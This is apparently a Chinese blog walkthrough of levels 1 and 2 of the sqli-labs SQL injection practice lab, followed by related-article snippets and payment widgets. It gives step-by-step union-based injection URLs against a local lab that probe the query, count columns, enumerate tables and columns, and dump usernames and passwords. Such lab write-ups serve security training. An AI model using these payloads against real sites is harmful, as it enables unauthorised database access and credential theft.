sqli-labs小游戏关(1-20)关详解

最新推荐文章于 2024-05-16 22:14:02 发布
最新推荐文章于 2024-05-16 22:14:02 发布
阅读量923 收藏 14
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51356351/article/details/109198820
版权

注意:有的代码可能存在中文标点导致命令执行不成功,多注意一下。

数据库名:database()

数据库版本: version()

数据库用户: user()

操作系统: @@version_compile_os

系统用户名: system_user()

当前用户名: current_user

连接数据库的用户名:session_user()

读取数据库路径:@@datadir

MYSQL安装路径:@@basedir

储存所有表名信息的表 : information_schema.tables

表名 : table_name

数据库名: table_schema

列名 : column_name

储存所有列名信息的表 : information_schema.columns

第一关

第一关是联合查询注入

判断注入点----判断是数字型还是字符型----查询列数----查询显示位----获取数据库名----获取数据库中的表名----获取列名----获取列中的数据 其实不管是联合查询还是盲注之类的基本都这样,大同小异。
http://localhost/sqli-labs-master/Less-1/?id=1’ – -

在这里插入图片描述http://localhost/sqli-labs-master/Less-1/?id=1’ and 1=1-- -

在这里插入图片描述
http://localhost/sqli-labs-master/Less-1/?id=1’ and 1=2-- -
在这里插入图片描述http://localhost/sqli-labs-master/Less-1/?id=1’ order by 3-- -

在这里插入图片描述
http://localhost/sqli-labs-master/Less-1/?id=1’ order by 4-- -
在这里插入图片描述
http://localhost/sqli-labs-master/Less-1/?id=-1’ union select 1,2,3-- -
在这里插入图片描述

http://localhost/sqli-labs-master/Less-1/?id=-1’ union select 1,database(),user()-- -

在这里插入图片描述

http://localhost/sqli-labs-master/Less-1/?id=-1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=“security”),3 – -
在这里插入图片描述

http://localhost/sqli-labs-master/Less-1/?id=-1’ union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=“security” and table_name=“users”),3 – -
在这里插入图片描述

http://localhost/sqli-labs-master/Less-1/?id=-1’ union select 1,(select group_concat(concat_ws(id,username,password)) from users),3-- -
在这里插入图片描述

第二关

第二关也是联合查询注入跟上关一样,只是闭合方式不同。

二、
http://localhost/sqli-labs-master/Less-2/?id=1 and 1=1
在这里插入图片描述

http://localhost/sqli-labs-master/Less-2/?id=1 and 1=2
在这里插入图片描述

http://localhost/sqli-labs-master/Less-2/?id=1 order by 3
在这里插入图片描述

http://localhost/sqli-labs-master/Less-2/?id=1 order by 4

在这里插入图片描述

http://localhost/sqli-labs-master/Less-2/?id=1 union select 1,2,3
在这里插入图片描述

http://localhost/sqli-labs-master/Less-2/?id=-1nion select 1,database(),user()
在这里插入图片描述

http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=“security”),3
在这里插入图片描述

http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=“security” and table_name=“users”),3
在这里插入图片描述

http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(concat_ws(id,username,password)) from users),3
在这里插入图片描述

最低0.47元/天 解锁文章
weixin_51356351
关注
  • 4
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
SQL注入篇——sqli-labs最详细1-40闯关指南
爱国小白帽
01-11 3万+
使用sqllabs游戏系统进行sql注入 1.首先确定用哪些字符可以进行sql注入 一.选择Less­1进入第一,在网址中添加标红内容,显示了用户和密码 http://localhost/sqllabs­master/Less­1/index.php?id=1’ and 1=1 ­­ ­ 把1=1改成1=2,不报错也不显示任何信息,说明可以利用 ’ 字符注入 二.进入第二,在网址中添...
Sqli-Labs Less1-16详细讲解
大大大蜜蜂的博客
10-21 3496
information_schema数据库介绍: information_schema数据库是MySQL自带的,它提供了访问数据库元数据的方式。元数据是于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。information_schema是信息数据库,其中保存着于mysql服务器所维护的所有其他数据库的信息。 下列为information_schema数据库中schemata表、tables表、columns表的介绍。 schemata表:提供了当前mysql实例中所有数据库的信息。 sche
SQLI-labs-第十七
最新发布
weixin_54055099的博客
05-16 898
Sqli-labs第十七,二次注入、报错注入
SQL小游戏
weixin_30892763的博客
07-07 729
技术中心的老师布置的,也贴上来分享下,看看大家有没有啥意见,哈哈 场景: create proc help as begin print '----------------------------------------------------- Hello, Welcome to Nani search adventure game! Your Role player as t...
xss-labs-master.zip(xss注入通游戏/靶场)
03-21
经典的xss注入通游戏,搭建简单。适合网络安全测试人员
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
sqli-labs闯关小游戏21-65.docx
10-23
这是个sql注入的文档,是sqli-labs闯关小游戏二十一到六十五详解,每一的步骤写得都很详细,前二十的话我已经发布了博客,有需要的可以下载一下。
2020.4.4 sqli-labs--第十五、十六
DSR446的博客
04-04 434
less-15 POST - Blind- Boolian/time Based - Single quotes (基于bool型/时间延迟单引号POST型盲注) 方法一 盲注 - 基于布尔值 - 字符串 怎么输入都没有回显,那就时间延迟吧。 布尔测试payload uname=admin' and 1=1 --+&passwd=admin&submit=Submit //登...
sqli-labs-master闯关(1-7闯关
JohnnyG2000的博客
01-08 697
Less-1: ?id=-1' union all select 1,2,3 --+ // 转译 ?id=-1%27%20union%20all%20select%201,2,3%20--+ Less-2: ?id=-1 union all select 1,2,3 // 转译 ?id=-1%20union%20all%20select%201,2,3 Less-3: ?id=-1') union all select 1,2,3 // 转译 ?id=-1%27)%20union%20all%2
SQLI-LABS(Basic Challenges)
volcano的博客
12-04 729
sql注入 SQL注入是比较常见的网络攻击方式之一,一般分为数字型和字符型,攻击者在HTTP请求中输入含有恶意构造且语法合法的SQL语句,只要应用程序中没有做严格的处理(例如校验或预拼接),那么就会出现SQL注入漏洞危险。 Sqli-labs Sqli-labs-master是一个用来学习sql注入闯关游戏。 之前看的教程中,普通题目大多数都是用union联合查询注入的,我用的是基于updatexml()函数的报错注入,这里也是参考大佬的博客慢慢学习。 函数解释:   UPDATEXML (XML_doc
Sqli-labs第一题详解
未完成的歌~的博客
06-10 1971
less1: 根据题目提示为单引号注入,先测试一下 果然报错了,说明我们添加的单引号被数据库成功解析,那我们就可以通过闭合id这个参数 ,然后构造自己的sql语句进行攻击。一般可以使用联合表的方式来提取自己感兴趣的信息(union),但是使用union语句有个前提就是union 后面的语句必须与前面的语句字段数以及类型必须一直,否则数据库会报错。 ...
SQLi-LABS(1~10详解
CTF小白的博客
09-22 6453
目录SQLi-LABS Less-1查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-2查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-3查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-4查看题目环境测试...
SQL注入sqli-labs-master Less-2
luoshiyong123的博客
03-28 317
存储id形式为整形即id=1 所以直接order by得到列数 然后union爆破
sqli-labs第九脚本解释
01-22
sqli-labs第九是一个延时盲注的挑战。在这个挑战中,你需要通过注入语句来判断条件是否为真,并通过延时来判断注入是否成功。 根据你提供的信息,你尝试了时间盲注的方法。你使用了单引号来闭合注入语句,并在...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值